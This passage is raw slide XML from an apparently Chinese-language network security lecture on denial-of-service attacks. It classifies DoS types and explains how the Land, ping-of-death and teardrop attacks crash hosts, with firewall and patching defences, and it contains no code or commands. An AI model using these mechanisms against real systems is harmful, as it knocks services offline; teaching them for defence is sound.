              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击：单挑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用攻击者单机资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射攻击：借刀杀人</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用反射服务器的资源进行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射服务：网络中能对服务或查询等请求进行应答的服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分布式拒绝服务攻击：围殴</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>控制网络中的傀儡主机，僵尸网络，使用其资源进行攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拒绝服务攻击的本质与形式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="灯片编号占位符 2"/>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A8CEF7F-E2C0-4D46-B177-FC6E805B1673}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>165</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4230164543"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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land</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ping of death</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>teardrop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN Flood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Smurf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>典型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</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166</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="606593457"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向被攻击主机发起特别的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第一次握手</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址欺骗：以受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>源、目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>导致：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被攻击主机向它自己发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二次握手</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自己又向自己发回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第三次握手，创建一个空连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>每一个这样的连接都将保留直到超时掉。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>影响：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>许多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统将崩溃，而 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows NT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会变的极其缓慢（大约持续五分钟）。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Land——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自握手</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167</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732241" y="56208"/>
            <a:ext cx="2386608" cy="2223548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2018322601"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>许多操作系统早期版本限制网络数据包的最大长度，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包最大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>64KB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 65535Byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Ping of death</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包分片：改变最后分片的正确偏移量和段长度，接收端重组报文总长度超过了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>64KB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>导致内存分配错误，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆栈崩溃，死机！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ping of death</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击包声称其长度超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>64K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ping of death</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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168</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2"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71207"/>
            <a:ext cx="6396037"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424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1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13"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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17"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483">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="27"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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ping of death</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防御：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>现有标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>实现都已实现对付超大尺寸的包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>windows98</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>之后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>windows,NT(service pack 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) linux, Solaris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mac OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>大多数防火墙能够自动过滤这些攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPct val="70000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>此外配置防火墙，阻断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>以及任何未知协议都将防止此类攻击</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169</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11712757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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11"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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17"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507">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23"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天时地利人和</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>人物</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>手段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击环节</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="482597459"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pul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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向攻击目标发送多个分片重叠的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>某些操作系统收到分片重叠的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包会系统崩溃、重启。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字节的数据报被分为两片，第一片数据发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0~36</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字节，而第二片发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>24~27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节，在某些情况下会破坏整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈，必须重新启动计算机才能恢复。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297986" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
